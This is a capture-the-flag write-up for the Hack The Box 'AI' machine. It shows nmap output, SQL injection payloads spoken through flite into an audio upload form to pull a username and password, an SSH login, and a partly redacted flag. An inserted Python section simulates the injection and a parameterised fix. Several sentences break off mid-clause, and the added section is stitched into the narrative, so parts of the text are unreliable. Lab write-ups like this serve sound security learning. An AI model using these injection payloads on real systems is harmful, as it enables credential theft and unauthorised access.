Hack The Box AI Machine Writeup – 10.10.10.163
Hello, here is the writeup of the new Hack The Box active machine AI. As usual I'm going to add the IP 10.10.10.163 to /etc/hosts as ai.htb for convenience.
Initial Nmap Scanning
➜ ai nmap -T4 -A -v ai.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-11 20:04 +03
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
Initiating Ping Scan at 20:04
Scanning ai.htb (10.10.10.163) [4 ports]
Completed Ping Scan at 20:04, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 20:04
Scanning ai.htb (10.10.10.163) [1000 ports]
Discovered open port 22/tcp on 10.10.10.163
Discovered open port 80/tcp on 10.10.10.163
Increasing send delay for 10.10.10.163 from 0 to 5 due to 290 out of 724 dropped probes since last increase.
Completed SYN Stealth Scan at 20:04, 9.04s elapsed (1000 total ports)
Initiating Service scan at 20:04
Scanning 2 services on ai.htb (10.10.10.163)
Completed Service scan at 20:04, 6.37s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against ai.htb (10.10.10.163)
Retrying OS detection (try #2) against ai.htb (10.10.10.163)
Retrying OS detection (try #3) against ai.htb (10.10.10.163)
Retrying OS detection (try #4) against ai.htb (10.10.10.163)
Retrying OS detection (try #5) against ai.htb (10.10.10.163)
Initiating Traceroute at 20:04
Completed Traceroute at 20:04, 0.20s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:04
Completed Parallel DNS resolution of 2 hosts. at 20:04, 0.77s elapsed
NSE: Script scanning 10.10.10.163.
Initiating NSE at 20:04
Completed NSE at 20:04, 6.17s elapsed
Initiating NSE at 20:04
Completed NSE at 20:04, 0.67s elapsed
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
Nmap scan report for ai.htb (10.10.10.163)
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
|   256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_  256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/11%OT=22%CT=1%CU=43569%PV=Y%DS=2%DC=T%G=Y%TM=5DC994
OS:BB%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Uptime guess: 25.597 days (since Thu Oct 17 05:45:15 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   199.36 ms 10.10.14.1
2   167.95 ms ai.htb (10.10.10.163)

NSE: Script Post-scanning.
Initiating NSE at 20:05
Completed NSE at 20:05, 0.00s elapsed
Initiating NSE at 20:05
Completed NSE at 20:05, 0.00s elapsed
Initiating NSE at 20:05
Completed NSE at 20:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.68 seconds
           Raw packets sent: 1779 (82.330KB) | Rcvd: 1162 (74.241KB)
The nmap scan revealed a couple of open ports: 80 (a web server) and 22 (SSH). Let's investigate port 80 first.
Port 80 hosts a website called "Artificial Intelligence" with four links: Home, About, AI and Contact. The About page has a small introduction that says "Our developers working 24/7 to make it happen and we progressed well with
The AI page has a file upload form, which is interesting; the Contact page has the machine maker MrR3boot's fake email address.
If you have rooted the machine Player, you should have come across the same situation. That machine as well has the same scenario of uploading
Let's exploit it.
I’m going to use Flite to create a
➜ ai flite -voice rms -o nav1n.wav -t "open single quote space and 1 = 2 union select, username from users comment database"
The above command creates a wav file called nav1n.wav, which I'm going to upload using the upload form.
Well, I have the username “Alexa” now.
Let's modify the command to get the password for the user Alexa.
➜ ai flite -voice rms -o nav1n.wav -t "open single quote space and 1 = 2 union select, password from users comment database"
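To make the speech-to-SQL trick above concrete, here is an added Python example (it is not code from the box or from this writeup) that simulates the server side. Two things in it are assumptions, not the box's real implementation: the normalisation of the transcript (the spoken phrases "open single quote", "space" and "comment database" become a single quote, a space and a SQL line comment, and spoken-pause punctuation such as the comma in "select, username" is dropped), and the hypothetical single-column lookup query over a phrases table that the transcript is concatenated into. The users table and its password value are constructed placeholders. The example runs both payloads from this page against the string-concatenated query and then against a parameterised one.

```python
import re
import sqlite3

# ASSUMPTION: how the box's speech-to-text output maps spoken phrases to SQL tokens.
# The writeup only shows that these phrases produced a working injection, so the
# exact rules are a guess that reproduces the observed effect.
SPOKEN_TOKENS = [
    ("open single quote", "'"),
    ("comment database", "--"),
    ("space", " "),
]

# The two sentences handed to flite on this page.
PAYLOAD_USERNAME = "open single quote space and 1 = 2 union select, username from users comment database"
PAYLOAD_PASSWORD = "open single quote space and 1 = 2 union select, password from users comment database"


def transcript_to_sql_text(spoken: str) -> str:
    """Turn the spoken sentence into the string the web app would receive."""
    text = spoken.lower()
    text = re.sub(r"[,.?!]", "", text)  # assumed: the engine drops pause punctuation
    for phrase, token in SPOKEN_TOKENS:
        text = text.replace(phrase, token)
    return re.sub(r"\s+", " ", text).strip()


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the box's database (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE phrases (phrase TEXT, reply TEXT);
        CREATE TABLE users   (username TEXT, password TEXT);
        INSERT INTO phrases VALUES ('hello', 'Hello AI!');
        INSERT INTO users   VALUES ('alexa', 'constructed-placeholder-password');
        """
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, text: str) -> list:
    """The pattern the page exploits: transcript concatenated straight into SQL.
    The query returns one column, so a one-column UNION SELECT lines up with it."""
    sql = f"SELECT reply FROM phrases WHERE phrase = '{text}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn: sqlite3.Connection, text: str) -> list:
    """Hardened version: the transcript is bound as data and never parsed as SQL."""
    sql = "SELECT reply FROM phrases WHERE phrase = ?"
    return [row[0] for row in conn.execute(sql, (text,))]


def run(spoken: str, query) -> list:
    """Transcribe (simulated) and execute through the chosen lookup function."""
    return query(build_db(), transcript_to_sql_text(spoken))


if __name__ == "__main__":
    print("transcript :", transcript_to_sql_text(PAYLOAD_USERNAME))
    print("vulnerable :", run(PAYLOAD_USERNAME, lookup_vulnerable))
    print("vulnerable :", run(PAYLOAD_PASSWORD, lookup_vulnerable))
    print("hardened   :", run(PAYLOAD_USERNAME, lookup_parameterised))
```

The transcript becomes `' and 1 = 2 union select username from users --`; the `and 1 = 2` empties the original result set so only the unioned row comes back, and the comment swallows the closing quote the application appends. The payload works against this simulated query because it selects exactly one column; against a query that selected more, the UNION would need padding with extra columns. The parameterised lookup returns nothing for the same input, which is the fix for the real application regardless of how the audio is transcribed.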
As I already have the credentials, let's try whether SSH works.
➜ ai ssh alexa@ai.htb
alexa@ai.htb's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 5.3.7-050307-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Nov 11 17:49:45 UTC 2019

  System load:  0.06              Processes:           149
  Usage of /:   28.2% of 19.56GB  Users logged in:     0
  Memory usage: 27%               IP address for eth0: 10.10.10.163
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

63 packages can be updated.
15 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Nov 11 17:01:16 2019 from 10.10.14.35
alexa@AI:~$
Yes, it works. Let's see if I can find user.txt.
alexa@AI:~$ ls
user.txt
alexa@AI:~$ cat user.txt
c43b62[-----------]da55e4b
alexa@AI:~$
That’s it for today.